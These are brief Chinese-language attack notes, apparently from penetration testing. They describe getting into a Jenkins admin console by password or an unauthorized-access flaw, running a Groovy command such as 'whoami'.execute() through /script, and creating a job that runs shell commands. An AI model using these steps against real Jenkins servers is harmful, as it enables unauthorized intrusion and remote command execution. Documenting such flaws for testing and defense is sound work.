1. 通过密码或者未授权访问漏洞进入后台
http://xx.xx.xx.xx:8080/script
执行命令
println "whoami".execute().text
1.png
1. 第二种方式
创建一个执行shell的任务
2.png
3.png
4.png
5.png
6.png
http://xx.xx.xx.xx:8080/script
执行命令
println "whoami".execute().text
创建一个执行shell的任务